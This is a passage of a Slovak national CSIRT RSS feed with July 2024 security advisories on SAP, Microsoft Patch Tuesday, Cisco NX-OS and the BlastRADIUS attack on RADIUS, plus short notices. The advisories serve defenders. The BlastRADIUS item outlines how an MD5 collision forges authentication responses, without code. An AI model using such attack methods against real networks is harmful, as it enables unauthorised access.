<p><strong>CVE-2024-39597 (CVSS skóre 7,2 )</strong></p>



<p><strong>Chyba CVE-2024-39597 sa týka nesprávnej autorizácie v&nbsp;systéme SAP Commerce</strong><strong>, čo umožňuje útočníkovi pristupovať k&nbsp;nesprávne nakonfigurovaným stránkam</strong><strong>. Úspešné zneužitie si vyžaduje aby útočník zneužil funkciu zabudnutého hesla pre získanie prístupu na stránku, pre ktorú je aktivované prihlásenie a&nbsp;registrácia bez schválenia</strong><strong>. Pokiaľ nie je lokalita izolovaná, umožňuje to prístup aj k&nbsp;iným neizolovaným lokalitám.</strong></p>



<p><strong>Ostatné zraniteľnosti so strednou závažnosťou sa nachádzajú v aplikáciách Landscape Management, Document Builder, NetWeaver, CRM, Business Warehouse, S/4HANA, Business Workflow, GUI for Windows, Transportation Management a Enable Now.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong><strong>Z</strong>ávažná</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Narušenie dostupnosti</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu na najnovšiu možnú verziu.</strong></p>



<p><strong>Pre zmiernenie zraniteľnosti CVE-2024-39592 odporúčame vypnúť zraniteľný modul.</strong></p>



<p><strong>Ako dočasné riešenie pre zraniteľnosť CVE-2024-39597 spoločnosť SAP odporúča vypnúť registráciu pre dotknuté izolované lokality Composable Storefront B2B a pre všetky neizolované lokality Composable Storefront B2B, ak je skoré prihlásenie povolené aspoň na jednej z týchto neizolovaných lokalít.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.securityweek.com/sap-patches-high-severity-vulnerabilities-in-pdce-commerce/">https://www.securityweek.com/sap-patches-high-severity-vulnerabilities-in-pdce-commerce/</a></p>



<p><a href="https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/knowledge-base/security-notes-news/2024%2007%20Patch%20Day%20Blog%20V1.pdf">https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/knowledge-base/security-notes-news/2024%2007%20Patch%20Day%20Blog%20V1.pdf</a></p>



<p><a href="https://onapsis.com/blog/sap-patch-day-july-2024/">https://onapsis.com/blog/sap-patch-day-july-2024/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1101/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci júlového Patch Tuesday opravil kritické a zero-day zraniteľnosti</title>
		<link>/posts/1098</link>
					<comments>/posts/1098#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Jul 2024 13:37:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1098</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v júli 2024 balík opráv pre portfólio svojich produktov opravujúci 139 zraniteľností, z ktorých 54 umožňuje vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v júli 2024 balík opráv pre portfólio svojich produktov opravujúci 139 zraniteľností, z ktorých 54 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v produkte Microsoft SharePoint Server a komponentoch Windows Imaging Component a Windows Remote Desktop Licensing Service. Zero-day zraniteľnosti s označením CVE-2024-38080 a CVE-2024-38112 sú aktívne zneužívané útočníkmi.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 8.0</li>



<li>Azure CycleCloud 7.9.0</li>



<li>Azure CycleCloud 7.9.1</li>



<li>Azure CycleCloud 7.9.10</li>



<li>Azure CycleCloud 7.9.11</li>



<li>Azure CycleCloud 7.9.2</li>



<li>Azure CycleCloud 7.9.3</li>



<li>Azure CycleCloud 7.9.4</li>



<li>Azure CycleCloud 7.9.5</li>



<li>Azure CycleCloud 7.9.6</li>



<li>Azure CycleCloud 7.9.7</li>



<li>Azure CycleCloud 7.9.8</li>



<li>Azure CycleCloud 7.9.9</li>



<li>Azure CycleCloud 8.0.0</li>



<li>Azure CycleCloud 8.0.1</li>



<li>Azure CycleCloud 8.0.2</li>



<li>Azure CycleCloud 8.1.0</li>



<li>Azure CycleCloud 8.1.1</li>



<li>Azure CycleCloud 8.2.0</li>



<li>Azure CycleCloud 8.2.1</li>



<li>Azure CycleCloud 8.2.2</li>



<li>Azure CycleCloud 8.3.0</li>



<li>Azure CycleCloud 8.4.0</li>



<li>Azure CycleCloud 8.4.1</li>



<li>Azure CycleCloud 8.4.2</li>



<li>Azure CycleCloud 8.5.0</li>



<li>Azure CycleCloud 8.6.0</li>



<li>Azure DevOps Server 2022.1</li>



<li>Azure Kinect SDK</li>



<li>Azure Network Watcher VM Extension for Windows</li>



<li>Microsoft .NET Framework 2.0 Service Pack 2</li>



<li>Microsoft .NET Framework 3.0 Service Pack 2</li>



<li>Microsoft .NET Framework 3.5</li>



<li>Microsoft .NET Framework 3.5 AND 4.7.2</li>



<li>Microsoft .NET Framework 3.5 AND 4.8</li>



<li>Microsoft .NET Framework 3.5 AND 4.8.1</li>



<li>Microsoft .NET Framework 3.5.1</li>



<li>Microsoft .NET Framework 4.6.2</li>



<li>Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2</li>



<li>Microsoft .NET Framework 4.6/4.6.2</li>



<li>Microsoft .NET Framework 4.8</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Defender for IoT</li>



<li>Microsoft Dynamics 365 (on-premises) version 9.1</li>



<li>Microsoft OLE DB Driver 18 for SQL Server</li>



<li>Microsoft OLE DB Driver 19 for SQL Server</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Outlook 2016 (32-bit edition)</li>



<li>Microsoft Outlook 2016 (64-bit edition)</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (CU 31)</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (CU 27)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (CU 13)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (GDR)</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.4</li>



<li>Microsoft Visual Studio 2022 version 17.6</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for ARM64-based Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 version 21H2 for ARM64-based Systems</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Spoločnosť Microsoft opravila v&nbsp;rámci svojho pravidelného balíka aktualizácií Patch Tuesday 139 zraniteľností, z&nbsp;toho je 5 je označených ako kritické a&nbsp;4 ako zero-day. Najzávažnejšie zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, eskaláciu privilégií, obídenie bezpečnostných prvkov, získanie neoprávneného prístupu k&nbsp;citlivým údajom, či zneprístupnenie služby. Zero-day zraniteľnosti s&nbsp;označením CVE-2024-38080 a CVE-2024-38112 sú aktívne zneužívané útočníkmi.</strong></p>



<p><strong></strong><strong>Kritické zraniteľnosti:</strong></p>



<p><strong>CVE-2024-38074, CVE-2024-38076,&nbsp; CVE-2024-38077</strong> (CVSS skóre 9,8)</p>



<p>Kritické zraniteľnosti v&nbsp;komponente Windows Remote Desktop Licencing Service spočívajú v&nbsp;podtečení celočíselnej premennej (CVE-2024-38074) a pretečení medzipamäte haldy (CVE-2024-38076, CVE-2024-38077). Vzdialený neautentifikovaný útočník by ich prostredníctvom zaslania špeciálne vytvorených paketov alebo správ mohol zneužiť na vykonanie škodlivého kódu.</p>



<p><strong>CVE-2024-38060</strong> (CVSS skóre 8,8)</p>



<p>Komponent Windows Imaging Component obsahuje zraniteľnosť, ktorá umožňuje vzdialené vykonanie škodlivého kódu. Úspešné zneužitie zraniteľnosti vyžaduje, aby autentifikovaný útočník nahral škodlivý TIFF súbor na zraniteľný server.</p>



<p><strong>CVE-2024-38023</strong> (CVSS skóre 7,2)</p>



<p>Zraniteľnosť v&nbsp;produkte Microsoft SharePoint Server umožňuje vzdialenému autentifikovanému útočníkovi s oprávneniami úrovne „Site Owner“ alebo vyššie vykonať škodlivý kód v kontexte SharePoint servera. Zraniteľnosť je možné zneužiť nahraním špeciálne vytvoreného súboru a následným zaslaním špeciálne vytvorenej API požiadavky, ktorá vedie k deserializácii parametrov tohto súboru.</p>



<p><strong>Zero-day zraniteľnosti:</strong></p>



<p><strong>CVE-2024-38080</strong> (CVSS skóre 7,8)</p>



<p>Zraniteľnosť v&nbsp;komponente <strong>Hyper-V</strong> spočíva v&nbsp;pretečení celočíselnej premennej a&nbsp;vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií na úroveň používateľa SYSTEM. <strong>Zraniteľnosť je</strong> v&nbsp;súčasnosti <strong>aktívne zneužívaná</strong> útočníkmi.</p>



<p><strong>CVE-2024-38112</strong> (CVSS skóre 7,5)</p>



<p>Komponent <strong>MSHTML Platform</strong> obsahuje <strong>aktívne zneužívanú zraniteľnosť</strong>, ktorú možno zneužiť na vykonanie bližšie nešpecifikovaných spoofing útokov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí spustiť škodlivý súbor vytvorený útočníkom.</p>



<p><strong>CVE-2024-35264</strong> (CVSS skóre 8,1)</p>



<p>CVE-2024-35264 v&nbsp;produktoch .NET a&nbsp;Visual Studio Code spočíva v&nbsp;použití odalokovaného miesta v&nbsp;pamäti, ktoré možno zneužiť na vzdialené vykonanie kódu. Pre úspešné zneužitie zraniteľnosti musí útočník vyhrať súbeh procesov, čo môže docieliť prerušením http/3 streamu počas prebiehajúceho spracovávania tela požiadavky.</p>



<p><strong>CVE-2024-37985</strong> (CVSS skóre 5,9)</p>



<p>Windows 11 verzie 23H2 a&nbsp;22H2 pre platformu ARM obsahujú zraniteľnosť, ktorú by lokálny neautentifikovaný útočník mohol zneužiť na získanie neoprávneného prístupu k&nbsp;obsahu haldy privilegovaného procesu bežiaceho na serveri.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie júlového balíka opráv na zraniteľné produkty spoločnosti Microsoft nájdete&nbsp;</strong><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul">tu</a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul">https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38023">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38023</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38060">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38060</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38074">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38074</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38076">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38076</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38080">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38080</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38112">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38112</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-35264">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-35264</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-37985">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-37985</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1098/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť protokolu RADIUS</title>
		<link>/posts/1095</link>
					<comments>/posts/1095#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Jul 2024 13:36:14 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Network Compromise]]></category>
		<guid isPermaLink="false">/?p=1095</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/radius.jpg" alt="" /></p>Tím výskumníkov popísal útok na protokol RADIUS, ktorým môže útočník pomocou manipulácie prefixu paketu a&#160;vytvorením kolízie MD5 pre premennú v&#160;ňom...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/radius.jpg" alt="" /></p>
<p><strong>Tím výskumníkov popísal útok na protokol RADIUS, ktorým môže útočník pomocou manipulácie prefixu paketu a&nbsp;vytvorením kolízie MD5 pre premennú v&nbsp;ňom zakomponovanú získať povolenie na prístup do administrátorského rozhrania sieťového zariadenia. Útočník nepotrebuje poznať heslo ani zdieľané tajomstvá.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>zariadenia a&nbsp;systémy využívajúce protokol RADIUS bez dodatočného zabezpečenia</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-3596</strong> (CVSS v3 skóre 7,5)</p>



<p>Výskumníci z&nbsp;viacerých univerzít a&nbsp;spoločností a spoločnosť <a href="https://www.inkbridgenetworks.com/blastradius">InkBridge Networks</a> zverejnili informáciu o&nbsp;<strong>útoku na protokol RADIUS</strong>, ktorým dokázali <strong>obísť autentifikáciu používateľa</strong>. Nazvali ho BlastRADIUS. Protokol slúži už tridsať rokov pre bezpečné riadenie prístupov do sietí a&nbsp;sieťových zariadení (vrátane VPN, Wifi a mobilných sietí).</p>



<p>Chyba, ktorú útok zneužíva, spočíva v&nbsp;<strong>dizajne paketov <em>Access-Request</em></strong>, ktorým chýba kontrola integrity a&nbsp;nie sú autentifikované. Paket s&nbsp;odpoveďou obsahuje hodnotu <strong><em>Response Authenticator</em></strong>, ktorá <strong>slúži na</strong> <strong>overenie integrity odpovede servera</strong>. Na jej výpočet však protokol <strong>využíva</strong> slabú hašovaciu <strong>funkcie MD5</strong>.</p>



<p>Útočník tak môže <strong>pomocou útoku MitM</strong> medzi klientom a&nbsp;serverom <strong>a&nbsp;útokom „chosen-prefix collision“ na MD5</strong> aj pri zamietnutí pripojenia (<em>Access-Reject</em>) <strong>vytvoriť falošný paket <em>Access-Accept</em></strong> so správnou&nbsp;hodnotou <em>Response Authenticator</em>. Výskumníci na to využili manipuláciu atribútu <em>Proxy-State</em>, ktorý vstupuje do výpočtu <em>Response Authenticator</em>, čím vytvorili kolíziu hašov MD5, t.j. získali platnú hodnotu <em>Response Authenticator</em>. Získanú hodnotu potom úspešne použili vo falošnom pakete <em>Access-Accept</em>.</p>



<p><strong>Útočník teda nemusí poznať heslo používateľa, ani zdieľané tajomstvá, aby prenikol napríklad do administrátorského rozhrania sieťového zariadenia.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Obídenie bezpečnostných prvkov</li>



<li>Kompromitácia siete</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu firmvéru sieťových prvkov a&nbsp;zariadení, ktoré využívajú protokol RADIUS.</strong></p>



<p><strong>Zraniteľnosť je možné mitigovať vynútením používania atribútu Message-Authenticator pre všetky požiadavky a&nbsp;odpovede pre klientov aj servery. Odpovede Access-Accept a&nbsp;Access-Reject by mali mať tento atribút na prvom mieste.</strong></p>



<p><strong>Bližšie informácie nájdete </strong><a href="https://datatracker.ietf.org/doc/draft-ietf-radext-deprecating-radius/">tu</a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.inkbridgenetworks.com/blastradius">https://www.inkbridgenetworks.com/blastradius</a></p>



<p><a href="https://www.blastradius.fail/">https://www.blastradius.fail/</a></p>



<p><a href="https://www.securityweek.com/blastradius-attack-exposes-critical-flaw-in-30-year-old-radius-protocol/">https://www.securityweek.com/blastradius-attack-exposes-critical-flaw-in-30-year-old-radius-protocol/</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/new-blast-radius-attack-bypasses-widely-used-radius-authentication/">https://www.bleepingcomputer.com/news/security/new-blast-radius-attack-bypasses-widely-used-radius-authentication/</a></p>



<p><a href="https://www.tenable.com/cve/CVE-2024-3596">https://www.tenable.com/cve/CVE-2024-3596</a></p>



<p><a href="https://blog.cloudflare.com/radius-udp-vulnerable-md5-attack">https://blog.cloudflare.com/radius-udp-vulnerable-md5-attack</a></p>



<p><a href="https://kb.cert.org/vuls/id/456537">https://kb.cert.org/vuls/id/456537</a></p>



<p><a href="https://datatracker.ietf.org/doc/draft-ietf-radext-deprecating-radius/">https://datatracker.ietf.org/doc/draft-ietf-radext-deprecating-radius/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1095/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ako nahlasovať podozrivé e-maily</title>
		<link>/posts/1090</link>
					<comments>/posts/1090#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 09 Jul 2024 11:47:56 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1090</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Pripravili sme pre vás návod, ako môžete jednoducho stiahnuť podozrivý e-mail, ktorý nám chcete poslať pre analýzu v rámci hlásenia...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Pripravili sme pre vás návod, ako môžete jednoducho stiahnuť podozrivý e-mail, ktorý nám chcete poslať pre analýzu v rámci hlásenia kybernetického bezpečnostného incidentu.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/07/Nahlasovanie-podozrivych-e-mailov.pdf"><strong>Ako nahlasovať podozrivé e-maily (07-2024)</strong></a></p>



<p>Viac návodov a odporúčaní nájdete<strong> <a href="https://csirt.sk/navody-a-odporucania" data-type="link" data-id="/navody-a-odporucania">tu</a>.</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1090/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností jún 2024</title>
		<link>/posts/1084</link>
					<comments>/posts/1084#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 09 Jul 2024 11:35:25 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1084</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci jún 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci jún 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/07/2024_06_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/07/2024_06_mesacnik.pdf">Mesačný prehľad – 06/2024 PDF (285 KB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" target="_blank" rel="noreferrer noopener">tomto odkaze</a>.</p>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1084/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Sociálne siete [Infografika]</title>
		<link>/posts/1073</link>
					<comments>/posts/1073#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 03 Jul 2024 12:39:58 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Infografika]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1073</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Pripravili sme si pre Vás infografiku o bezpečnosti na sociálnych sieťach. S akými najbežnejšími, aktuálnymi formami útokov sa na nich...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Pripravili sme si pre Vás infografiku o bezpečnosti na sociálnych sieťach. S akými najbežnejšími, aktuálnymi formami útokov sa na nich môžete stretnúť? Ako ich identifikovať podvodníkov, predátorov, falošný a škodlivý obsah a ako chrániť seba a svoje citlivé informácie?</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="1024" src="/wp-content/uploads/2024/07/OCAInfografika_Socialnesiete_1-1024x1024.jpeg" alt="" class="wp-image-1076"/></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="1024" src="/wp-content/uploads/2024/07/OCAInfografika_Socialnesiete_OCA2-1024x1024.jpeg" alt="" class="wp-image-1077"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1073/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zero-day zraniteľnosť v prepínačoch CISCO NEXUS a MDS</title>
		<link>/posts/1068</link>
					<comments>/posts/1068#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 03 Jul 2024 12:27:55 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<guid isPermaLink="false">/?p=1068</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť CISCO vydala bezpečnostné aktualizácie na sieťové prepínače série NEXUS a&#160;MDS, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť umožňujúcu vykonanie škodlivého...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť CISCO vydala bezpečnostné aktualizácie na sieťové prepínače série NEXUS a&nbsp;MDS, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť umožňujúcu vykonanie škodlivého kódu. Napriek tomu, že zneužitie zraniteľnosti vyžaduje administrátorský prístup k&nbsp;zraniteľnému zariadeniu, CISCO a&nbsp;bezpečnostní výskumníci zo spoločnosti SYGNIA evidujú prípady jej úspešného zneužitia zo strany čínskej skupiny VELVET ANT.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Prepínače série CISCO Nexus 3000</li>



<li>Prepínače série CISCO Nexus 5500</li>



<li>Prepínače série CISCO Nexus 5600</li>



<li>Prepínače série CISCO Nexus 6000</li>



<li>Prepínače série CISCO Nexus 7000</li>



<li>Prepínače série CISCO Nexus 9000 v standalone NX-OS režime</li>



<li>Prepínače série CISCO MDS 9000</li>
</ul>



<p><em>Pozn. Presnú špecifikáciu zasiahnutých produktov môžete nájsť na </em><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-cmd-injection-xD9OhyOP"><strong><em>stránke výrobcu</em></strong></a><em>.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-20399 </strong>(CVSS skóre 6.0)</p>



<p>Zero-day zraniteľnosť operačného systému NX-OS spočíva v&nbsp;nedostatočnom overovaní argumentov v&nbsp;rámci príkazového riadka CLI. Lokálny autentifikovaný útočník s&nbsp;administrátorským prístupom by ju prostredníctvom injekcie príkazov mohol zneužiť na vykonanie škodlivého kódu s&nbsp;oprávneniami používateľa root. Zraniteľnosť je aktívne zneužívaná čínskou skupinou VELVET ANT na inštaláciu bližšie nešpecifikovaného malvéru, ktorý umožňuje vzdialený prístup, uploadovanie súborov a&nbsp;vykonanie škodlivého kódu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-cmd-injection-xD9OhyOP">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-cmd-injection-xD9OhyOP</a></p>



<p><a href="https://www.sygnia.co/threat-reports-and-advisories/china-nexus-threat-group-velvet-ant-exploits-cisco-0-day/">https://www.sygnia.co/threat-reports-and-advisories/china-nexus-threat-group-velvet-ant-exploits-cisco-0-day/</a></p>



<p><a href="https://thehackernews.com/2024/07/chinese-hackers-exploiting-cisco.html">https://thehackernews.com/2024/07/chinese-hackers-exploiting-cisco.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1068/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Polyfill – z bežnej webovej knižnice malvér</title>
		<link>/posts/1065</link>
					<comments>/posts/1065#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 03 Jul 2024 12:26:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Polyfill]]></category>
		<guid isPermaLink="false">/?p=1065</guid>

